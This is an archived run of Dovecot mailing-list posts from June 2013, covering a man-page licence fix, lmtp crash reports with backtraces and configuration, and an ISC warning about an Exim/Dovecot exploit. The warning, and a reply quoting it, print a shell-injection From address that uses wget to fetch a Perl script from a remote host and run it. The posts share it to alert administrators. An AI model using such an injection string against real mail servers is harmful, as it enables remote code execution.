Re: [Dovecot] Man page: LGPL Version

2013-06-09 Thread Timo Sirainen 
On 9.6.2013, at 17.34, Oli Schacher  wrote:

> Hi Timo
> 
> http://hg.dovecot.org/dovecot-2.2/rev/1f3f21081ee5 : man pages: Updated
> v2.1 -> v2.2  
> 
> dovecot.1.in now references a inexistent "LGPLv2.2" instead of
> "LGPLv2.1"

Good catch :) Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/45399357008a

[Dovecot] Man page: LGPL Version

2013-06-09 Thread Oli Schacher 
Hi Timo

http://hg.dovecot.org/dovecot-2.2/rev/1f3f21081ee5 : man pages: Updated
v2.1 -> v2.2  

dovecot.1.in now references a inexistent "LGPLv2.2" instead of
"LGPLv2.1"

Re: [Dovecot] v2.2.2 (266101990d63) Core Dump

2013-06-09 Thread Thomas Leuxner 
* Timo Sirainen  2013.06.09 13:57:

> Fixed: http://hg.dovecot.org/dovecot-2.2/rev/73b7fce1643e
> Fixed: http://hg.dovecot.org/dovecot-2.2/rev/921017adcb7b

Both confirmed. Thanks.


signature.asc
Description: Digital signature

Re: [Dovecot] v2.2.2 (266101990d63) Core Dump

2013-06-09 Thread Timo Sirainen 
On 9.6.2013, at 11.12, Thomas Leuxner  wrote:

> ==> /var/log/dovecot/dovecot.log <==
> Jun  9 09:58:26 spectre dovecot: lmtp: Fatal: master: service(lmtp): child 
> 12635 killed with signal 11 (core dumped)
> 
> This is another segmentation fault introduced in the current code.

Fixed: http://hg.dovecot.org/dovecot-2.2/rev/73b7fce1643e

> Please also look into fixing the other Core Dump I reported:
> 
> http://www.dovecot.org/list/dovecot/2013-June/090795.html

Fixed: http://hg.dovecot.org/dovecot-2.2/rev/921017adcb7b

[Dovecot] lmpt-service crash after update

2013-06-09 Thread listserv 
Hello,

since the last update today without a change on the config, the lmtp-service
crash with the follow messages:


Jun  9 13:16:43 kobe kernel: lmtp[25881]: segfault at 4 ip b7568e83 sp bfbe01b0
error 4 in libdovecot.so.0.0.0[b750c000+c6000]

Jun  9 13:16:43 kobe dovecot: lmtp(25881): Fatal: master: service(lmtp): child
25881 killed with signal 11 (core dumped)

GNU gdb (GDB) 7.6-debian
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /usr/lib/dovecot/lmtp...(no debugging symbols 
found)...done.
[New LWP 25823]

warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[Thread debugging using libthread_db enabled]
Using host libthread_db library 
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
Core was generated by `dovecot/lmtp'.
Program terminated with signal 11, Segmentation fault.
#0  0xb75a2e83 in buffer_append () from /usr/lib/dovecot/libdovecot.so.0

(gdb) bt full
#0  0xb75a2e83 in buffer_append () from /usr/lib/dovecot/libdovecot.so.0
No symbol table info available.
#1  0xb76821cb in mail_namespace_add_storage () from
/usr/lib/dovecot/libdovecot-storage.so.0
No symbol table info available.
#2  0xb76885ed in mail_storage_create_full () from
/usr/lib/dovecot/libdovecot-storage.so.0
No symbol table info available.
#3  0xb76889a5 in mail_storage_create () from
/usr/lib/dovecot/libdovecot-storage.so.0
No symbol table info available.
#4  0xb76802f5 in raw_storage_create_from_set () from
/usr/lib/dovecot/libdovecot-storage.so.0
No symbol table info available.
#5  0x0804c578 in client_create ()


No symbol table info available.


#6  0x0804bbf2 in _start ()


No symbol table info available.


(gdb)
--
doveconf -n
# 2.2.2 (266101990d63): /etc/dovecot/dovecot.conf
# OS: Linux 3.2.28.stk32 i686 Debian jessie/sid ext3


auth_debug = yes
auth_debug_passwords = yes
auth_mechanisms = digest-md5 cram-md5
auth_username_translation = %Lu
auth_verbose = yes
auth_verbose_passwords = plain
dict {
  expire = db:/var/lib/dovecot/expire.db
}
hostname = kobe.vtlx.cn
mail_attachment_dir = /var/mail/attachment
mail_debug = yes
mail_gid = vmail
mail_home = /var/mail/vhosts/%Ld/%Ln
mail_location = sdbox:/var/mail/vhosts/%Ld/%Ln:DIRNAME=DbOx-mAiLs
mail_plugins = " quota mail_log notify expire zlib"
mail_privileged_group = vmail
mail_uid = vmail
mailbox_list_index = yes
managesieve_notify_capability = mailto
managesieve_sieve_capability = fileinto reject envelope encoded-character
vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy
include variables body enotify environment mailbox date ihave
namespace inbox {
  inbox = yes
  location =
  mailbox Drafts {
auto = subscribe
special_use = \Drafts
  }
  mailbox Sent {
auto = subscribe
special_use = \Sent
  }
  mailbox Spam {
auto = subscribe
special_use = \Junk
  }
  mailbox Trash {
auto = subscribe
special_use = \Trash
  }
  prefix =
  separator = /
  subscriptions = yes
  type = private
}
passdb {
  args = scheme=PLAIN username_format=%Lu /etc/dovecot/user_pw/passwd
  driver = passwd-file
}
plugin {
  acl = vfile
  acl_shared_dict = file:/var/mail/shared-db/shared-mailboxes
  expire = Trash 2h
  expire_dict = proxy::expire
  mail_log_events = delete undelete copy mailbox_delete mailbox_rename expunge
save mailbox_create
  mail_log_fields = uid box msgid size
  quota = dict:User quota::file:/var/mail/vhosts/%Ld/%Ln/dovecot-quota
  quota_exceeded_message = Die Mailbox des Empfaengers ist voll -- Quota
exceeded -- Please contact 
  quota_grace = 10%%
  quota_rule = *:storage=30M
  quota_rule2 = Trash:storage=+10%%
  quota_status_nouser = DUNNO
  quota_status_overquota = "552 5.5.2 Die Mailbox des Empfaengers ist voll ##
Quota exceeded ## Please contact "
  quota_status_success = DUNNO
  quota_warning = storage=95%% quota-warning 95 %u
  quota_warning2 = storage=90%% quota-warning 90 %u
  quota_warning3 = storage=85%% quota-warning 85 %u
  quota_warning4 = storage=80%% quota-warning 80 %u
  quota_warning5 = storage=70%% quota-warning 70 %u
  sieve = ~/.dovecot.sieve
  sieve_dir = ~/sieve
}
postmaster_address = postmas...@xtlv.cn
protocols = " imap lmtp sieve pop3"
rejection_reason = Your message to <%t> was automatically rejected:%n%r [TEST]
service auth {
  unix_listener /var/spool/postfix/private/auth {
group = postfix
mode = 0660
user = postfix
  }
  unix_listener auth-userdb {
mode = 0600
user = vmail
  }
}
service config {
  unix_listener config {
mode = 0600
user = vmail
  }
}
service dict {

Re: [Dovecot] from ISC: Exim/Dovecot exploit making the rounds

2013-06-09 Thread Noel Butler 

Actually, it is an exploit against dovecot LDA, introduced, and caused
by, exim.



On Sun, 2013-06-09 at 09:58 +0200, Luigi Rosa wrote:

> One of our readers wrote in to let us know that he had received an attempted 
> Exim/Dovecot exploit attempt against his email server.  The exploit partially 
> looked like this:
> 
> From: 
> x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
> 
> (Obviously edited for your safety, and I didn't post the whole thing.)
> 
> This is an exploit against Dovecot that is using the feature "use_shell" 
> against 
> itself.  This feature, unfortunately, is found in the example wiki on 
> Dovecot's 
> website, and also in their example configuration.  We'd caution anyone that 
> is 
> using Dovecot to take a look at their configuration and make use they aren't 
> using the "use_shell" parameter.  Or if you are, make darn sure you know what 
> you are doing, and how to defend yourself.
> 
> 
> https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
> 
> 
> 
> 
> Ciao,
> luigi
> 




signature.asc
Description: This is a digitally signed message part

[Dovecot] v2.2.2 (266101990d63) Core Dump

2013-06-09 Thread Thomas Leuxner 
==> /var/log/dovecot/dovecot.log <==
Jun  9 09:58:26 spectre dovecot: lmtp: Fatal: master: service(lmtp): child 
12635 killed with signal 11 (core dumped)

This is another segmentation fault introduced in the current code. Please also 
look into fixing the other Core Dump I reported:

http://www.dovecot.org/list/dovecot/2013-June/090795.html

(gdb) bt full
#0  0x7f305d3df646 in buffer_append (buf=0x0, data=0x7fff92c0d218, 
data_size=0) at buffer.c:184
No locals.
#1  0x7f305d6bee16 in array_append_i (data=0x7fff92c0d218, array=0x1267448, 
count=) at ../../src/lib/array.h:148
count = 1
#2  mail_namespace_add_storage (ns=ns@entry=0x12673f0, storage=0x7fff92c0d218, 
storage@entry=0x126cb50) at mail-namespace.c:39
No locals.
#3  0x7f305d6c488d in mail_storage_create_full (ns=ns@entry=0x12673f0, 
driver=, driver@entry=0x7f305d7263a4 "raw", data=, flags=flags@entry=0, 
storage_r=storage_r@entry=0x7fff92c0d318, 
error_r=error_r@entry=0x7fff92c0d338) at mail-storage.c:397
storage_class = 0x7f305d95a560
storage = 0x126cb50
list = 0x1271800
list_set = {layout = 0x125b050 "none", root_dir = 0x125b048 "", 
index_dir = 0x0, index_pvt_dir = 0x0, control_dir = 0x0, alt_dir = 0x0, 
inbox_path = 0x0, 
  subscription_fname = 0x7f305d72310d "subscriptions", maildir_name = 
0x7f305d71e70b "", mailbox_dir_name = 0x7f305d71e70b "", escape_char = 0 
'\000', broken_char = 0 '\000', utf8 = false, 
  alt_dir_nocheck = false}
list_flags = 
p = 
__FUNCTION__ = "mail_storage_create_full"
#4  0x7f305d6c4b7e in mail_storage_create (ns=ns@entry=0x12673f0, 
driver=driver@entry=0x7f305d7263a4 "raw", flags=flags@entry=0, 
error_r=error_r@entry=0x7fff92c0d338) at mail-storage.c:407
storage = 0x7f305dd87a38
#5  0x7f305d6bd605 in raw_storage_create_from_set (set_info=, set=) at raw-storage.c:48
user = 0x126d7f0
ns = 0x12673f0
ns_set = 0x126f2e0
mail_set = 
error = 0x0
#6  0x00405762 in client_raw_user_create (client=) at 
client.c:150
sets = 
#7  client_create (fd_in=12, fd_out=12, conn=) at client.c:242
client = 0x1267f10
pool = 0x1267ef0
#8  0x7f305d3a8740 in master_service_listen (l=0x1266120) at 
master-service.c:826
service = 0x12625a0
conn = {fd = 12, listen_fd = 8, name = 0x1262905 "dovecot-lmtp", 
remote_ip = {family = 0, u = {ip6 = {__in6_u = {__u6_addr8 = '\000' , __u6_addr16 = {0, 0, 0, 0, 0, 0, 0, 0}, 
  __u6_addr32 = {0, 0, 0, 0}}}, ip4 = {s_addr = 0}}}, 
remote_port = 0, fifo = 0, ssl = 0, accepted = 1}
#9  0x7f305d3f2996 in io_loop_call_io (io=0x12661c0) at ioloop.c:387
ioloop = 0x1262710
t_id = 2
#10 0x7f305d3f3807 in io_loop_handler_run (ioloop=ioloop@entry=0x1262710) 
at ioloop-epoll.c:215
ctx = 0x1265540
events = 0x0
event = 0x12655b0
list = 0x1266210
io = 
tv = {tv_sec = 2147483, tv_usec = 0}
events_count = 
msecs = 
ret = 1
i = 
call = 
__FUNCTION__ = "io_loop_handler_run"
#11 0x7f305d3f24d8 in io_loop_run (ioloop=0x1262710) at ioloop.c:406
No locals.
---Type  to continue, or q  to quit--- 
#12 0x7f305d3a8013 in master_service_run (service=0x12625a0, 
callback=callback@entry=0x404dd0 ) at master-service.c:560
No locals.
#13 0x00404c24 in main (argc=1, argv=0x1262390) at main.c:122
set_roots = {0x60a6a0, 0x409260, 0x0}
service_flags = 
storage_service_flags = 675
c = 



signature.asc
Description: Message signed with OpenPGP using GPGMail

[Dovecot] from ISC: Exim/Dovecot exploit making the rounds

2013-06-09 Thread Luigi Rosa 
One of our readers wrote in to let us know that he had received an attempted 
Exim/Dovecot exploit attempt against his email server.  The exploit partially 
looked like this:


From: 
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com


(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that is using the feature "use_shell" against 
itself.  This feature, unfortunately, is found in the example wiki on Dovecot's 
website, and also in their example configuration.  We'd caution anyone that is 
using Dovecot to take a look at their configuration and make use they aren't 
using the "use_shell" parameter.  Or if you are, make darn sure you know what 
you are doing, and how to defend yourself.



https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962




Ciao,
luigi

--
/
+--[Luigi Rosa]--
\

The generation of random numbers is too important to be left to chance.